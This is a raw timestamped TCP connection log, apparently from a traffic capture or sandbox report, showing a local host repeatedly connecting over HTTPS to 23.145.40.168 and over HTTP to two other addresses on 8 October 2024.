                                                                                                                                      Oct 8, 2024 03:15:24.284358978 CEST49951443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:24.284388065 CEST4434995123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:24.284399986 CEST49951443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:24.284399986 CEST49951443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:24.284405947 CEST4434995123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:24.284413099 CEST4434995123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:24.287772894 CEST49959443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:24.287857056 CEST4434995923.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:24.288054943 CEST49959443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:24.288265944 CEST49959443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:24.288300037 CEST4434995923.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:24.896055937 CEST4434995923.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:24.896214962 CEST49959443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:24.897034883 CEST49959443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:24.897063971 CEST4434995923.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:24.898102045 CEST4434995923.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:24.904417038 CEST49959443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:24.904417038 CEST49959443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:24.904455900 CEST4434995923.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:25.174679995 CEST4434995923.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:25.175061941 CEST4434995923.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:25.175074100 CEST49959443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:25.175074100 CEST49959443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:25.175163984 CEST4434995923.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:25.175209045 CEST49959443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:25.175225973 CEST4434995923.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:25.181016922 CEST49965443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:25.181098938 CEST4434996523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:25.181245089 CEST49965443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:25.181513071 CEST49965443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:25.181545973 CEST4434996523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:25.809046030 CEST4434996523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:25.809230089 CEST49965443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:25.812314987 CEST49965443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:25.812369108 CEST4434996523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:25.813285112 CEST4434996523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:25.814208984 CEST49965443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:25.814209938 CEST49965443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:25.814308882 CEST4434996523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:26.096117973 CEST4434996523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:26.096239090 CEST4434996523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:26.096427917 CEST49965443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:26.096429110 CEST49965443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:26.096429110 CEST49965443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:26.096513033 CEST4434996523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:26.098939896 CEST49971443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:26.099029064 CEST4434997123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:26.099097013 CEST49971443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:26.099317074 CEST49971443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:26.099337101 CEST4434997123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:26.399452925 CEST49965443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:26.399514914 CEST4434996523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:26.713082075 CEST4434997123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:26.713166952 CEST49971443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:26.717621088 CEST49971443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:26.717633963 CEST4434997123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:26.718147039 CEST4434997123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:26.719012022 CEST49971443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:26.719052076 CEST49971443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:26.719067097 CEST4434997123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:27.035473108 CEST4434997123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:27.035613060 CEST4434997123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:27.035624981 CEST49971443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:27.035666943 CEST4434997123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:27.035681963 CEST49971443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:27.035681963 CEST49971443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:27.035691023 CEST4434997123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:27.035701036 CEST4434997123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:27.038368940 CEST49977443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:27.038455963 CEST4434997723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:27.038578033 CEST49977443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:27.038847923 CEST49977443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:27.038870096 CEST4434997723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:27.634516001 CEST4434997723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:27.634619951 CEST49977443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:27.635587931 CEST49977443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:27.635617018 CEST4434997723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:27.636027098 CEST4434997723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:27.641948938 CEST49977443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:27.641988993 CEST49977443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:27.642004967 CEST4434997723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:27.919873953 CEST4434997723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:27.919930935 CEST4434997723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:27.920073986 CEST49977443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:27.920150995 CEST49977443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:27.920182943 CEST4434997723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:27.920218945 CEST49977443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:27.920231104 CEST4434997723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:27.976610899 CEST49983443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:27.976696014 CEST4434998323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:27.977385998 CEST49983443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:27.977762938 CEST49983443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:27.977839947 CEST4434998323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:28.575962067 CEST4434998323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:28.576163054 CEST49983443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:28.577634096 CEST49983443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:28.577687979 CEST4434998323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:28.578737020 CEST4434998323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:28.579374075 CEST49983443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:28.579374075 CEST49983443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:28.579416037 CEST4434998323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:28.860124111 CEST4434998323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:28.860260963 CEST4434998323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:28.860512018 CEST49983443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:28.860512972 CEST49983443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:28.860512972 CEST49983443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:28.869081974 CEST49989443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:28.869132042 CEST4434998923.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:28.869198084 CEST49989443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:28.869425058 CEST49989443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:28.869435072 CEST4434998923.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:29.243208885 CEST49983443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:29.243268967 CEST4434998323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:29.474678993 CEST4434998923.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:29.474745035 CEST49989443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:29.475847960 CEST49989443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:29.475858927 CEST4434998923.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:29.476619005 CEST4434998923.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:29.478111029 CEST49989443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:29.478621006 CEST49989443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:29.478627920 CEST4434998923.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:29.756818056 CEST4434998923.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:29.756997108 CEST4434998923.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:29.757162094 CEST49989443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:29.757193089 CEST49989443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:36.604944944 CEST50043443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:36.605035067 CEST4435004323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:37.210438967 CEST4435004323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:37.210643053 CEST50043443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:37.211591005 CEST50043443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:37.211621046 CEST4435004323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:37.211850882 CEST4435004323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:37.218725920 CEST50043443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:37.218767881 CEST50043443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:37.218779087 CEST4435004323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:38.491779089 CEST4435004323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:38.491833925 CEST4435004323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:38.492017984 CEST50043443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:38.498764038 CEST50043443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:38.498764038 CEST50043443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:38.498827934 CEST4435004323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:38.498862982 CEST4435004323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:42.473069906 CEST50055443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:42.473104954 CEST4435005523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:42.473162889 CEST50055443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:42.475965023 CEST50055443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:42.475980997 CEST4435005523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:43.101691961 CEST4435005523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:43.101984978 CEST50055443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:43.103871107 CEST50055443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:43.103879929 CEST4435005523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:43.104357958 CEST4435005523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:43.167380095 CEST50055443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:43.167380095 CEST50055443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:43.167642117 CEST4435005523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:43.541102886 CEST4435005523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:43.541260004 CEST4435005523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:43.541382074 CEST50055443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:43.562449932 CEST50055443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:15:43.562464952 CEST4435005523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:15.947129965 CEST5005680192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:15.953563929 CEST8050056180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:15.953653097 CEST5005680192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:15.953778028 CEST5005680192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:15.953795910 CEST5005680192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:15.958683014 CEST8050056180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:15.958713055 CEST8050056180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:17.332349062 CEST8050056180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:17.332765102 CEST8050056180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:17.332901955 CEST5005680192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:17.332901955 CEST5005680192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:17.337928057 CEST8050056180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:23.845138073 CEST5005780192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:23.850636005 CEST8050057180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:23.850723982 CEST5005780192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:23.850915909 CEST5005780192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:23.851033926 CEST5005780192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:23.855737925 CEST8050057180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:23.855854988 CEST8050057180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:25.215214968 CEST8050057180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:25.215264082 CEST8050057180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:25.215332985 CEST5005780192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:25.215516090 CEST5005780192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:25.220391035 CEST8050057180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:33.774234056 CEST5005880192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:33.779536963 CEST8050058180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:33.779933929 CEST5005880192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:33.780054092 CEST5005880192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:33.780088902 CEST5005880192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:33.784904003 CEST8050058180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:33.784934044 CEST8050058180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:35.175225973 CEST8050058180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:35.175276995 CEST8050058180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:35.175376892 CEST5005880192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:35.175527096 CEST5005880192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:35.180352926 CEST8050058180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:46.156531096 CEST5005980192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:46.161938906 CEST8050059180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:46.162009954 CEST5005980192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:46.162148952 CEST5005980192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:46.162180901 CEST5005980192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:46.167027950 CEST8050059180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:46.167109013 CEST8050059180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:47.542952061 CEST8050059180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:47.543003082 CEST8050059180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:47.543159962 CEST5005980192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:47.543240070 CEST5005980192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:16:47.548252106 CEST8050059180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:56.793262005 CEST50060443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:56.793298960 CEST4435006023.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:56.793365955 CEST50060443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:56.793705940 CEST50060443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:56.793714046 CEST4435006023.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:57.405858040 CEST4435006023.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:57.405934095 CEST50060443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:57.407432079 CEST50060443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:57.407442093 CEST4435006023.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:57.408343077 CEST4435006023.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:57.444282055 CEST50060443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:57.444283009 CEST50060443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:57.444641113 CEST4435006023.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:57.772044897 CEST4435006023.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:57.772115946 CEST4435006023.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:57.772294998 CEST50060443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:57.772322893 CEST50060443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:57.772322893 CEST50060443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:57.772347927 CEST4435006023.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:57.772358894 CEST4435006023.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:57.782928944 CEST50061443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:57.783031940 CEST4435006123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:57.783127069 CEST50061443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:57.783447027 CEST50061443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:57.783472061 CEST4435006123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:58.434278965 CEST4435006123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:58.434478998 CEST50061443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:58.435488939 CEST50061443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:58.435543060 CEST4435006123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:58.436604023 CEST4435006123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:58.437437057 CEST50061443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:58.437437057 CEST50061443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:58.437532902 CEST4435006123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:58.803865910 CEST4435006123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:58.804006100 CEST4435006123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:58.804166079 CEST50061443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:58.804167032 CEST50061443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:58.804167032 CEST50061443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:58.804261923 CEST4435006123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:59.149600983 CEST50061443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:16:59.149666071 CEST4435006123.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:01.162631035 CEST5006280192.168.2.4201.103.8.135
                                                                                                                                      Oct 8, 2024 03:17:01.167649984 CEST8050062201.103.8.135192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:01.167735100 CEST5006280192.168.2.4201.103.8.135
                                                                                                                                      Oct 8, 2024 03:17:01.167900085 CEST5006280192.168.2.4201.103.8.135
                                                                                                                                      Oct 8, 2024 03:17:01.167931080 CEST5006280192.168.2.4201.103.8.135
                                                                                                                                      Oct 8, 2024 03:17:01.172755003 CEST8050062201.103.8.135192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:01.172955036 CEST8050062201.103.8.135192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:02.271806002 CEST8050062201.103.8.135192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:02.272062063 CEST8050062201.103.8.135192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:02.272121906 CEST5006280192.168.2.4201.103.8.135
                                                                                                                                      Oct 8, 2024 03:17:02.272159100 CEST5006280192.168.2.4201.103.8.135
                                                                                                                                      Oct 8, 2024 03:17:02.277270079 CEST8050062201.103.8.135192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:15.665070057 CEST50063443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:17:15.665106058 CEST4435006323.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:15.665169001 CEST50063443192.168.2.423.145.40.168
Oct 8, 2024 03:17:15.665441990 CEST | 50063 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:15.665451050 CEST | 443 | 50063 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:16.302692890 CEST | 443 | 50063 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:16.302752972 CEST | 50063 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:16.304965019 CEST | 50063 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:16.304985046 CEST | 443 | 50063 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:16.305334091 CEST | 443 | 50063 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:16.306660891 CEST | 50063 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:16.306682110 CEST | 50063 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:16.306777000 CEST | 443 | 50063 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:16.585520029 CEST | 443 | 50063 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:16.585586071 CEST | 443 | 50063 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:16.585632086 CEST | 50063 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:16.585768938 CEST | 50063 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:16.585789919 CEST | 443 | 50063 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:16.585817099 CEST | 50063 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:16.585823059 CEST | 443 | 50063 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:19.592775106 CEST | 50064 | 80 | 192.168.2.4 | 201.103.8.135
Oct 8, 2024 03:17:19.597774029 CEST | 80 | 50064 | 201.103.8.135 | 192.168.2.4
Oct 8, 2024 03:17:19.598494053 CEST | 50064 | 80 | 192.168.2.4 | 201.103.8.135
Oct 8, 2024 03:17:19.598702908 CEST | 50064 | 80 | 192.168.2.4 | 201.103.8.135
Oct 8, 2024 03:17:19.598714113 CEST | 50064 | 80 | 192.168.2.4 | 201.103.8.135
Oct 8, 2024 03:17:19.604377031 CEST | 80 | 50064 | 201.103.8.135 | 192.168.2.4
Oct 8, 2024 03:17:19.604424953 CEST | 80 | 50064 | 201.103.8.135 | 192.168.2.4
Oct 8, 2024 03:17:20.703741074 CEST | 80 | 50064 | 201.103.8.135 | 192.168.2.4
Oct 8, 2024 03:17:20.704294920 CEST | 80 | 50064 | 201.103.8.135 | 192.168.2.4
Oct 8, 2024 03:17:20.704358101 CEST | 50064 | 80 | 192.168.2.4 | 201.103.8.135
Oct 8, 2024 03:17:20.704391003 CEST | 50064 | 80 | 192.168.2.4 | 201.103.8.135
Oct 8, 2024 03:17:20.709630013 CEST | 80 | 50064 | 201.103.8.135 | 192.168.2.4
Oct 8, 2024 03:17:33.681612015 CEST | 50065 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:33.681663036 CEST | 443 | 50065 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:33.681732893 CEST | 50065 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:33.682075024 CEST | 50065 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:33.682087898 CEST | 443 | 50065 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:34.322112083 CEST | 443 | 50065 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:34.322187901 CEST | 50065 | 443 | 192.168.2.4 | 23.145.40.168
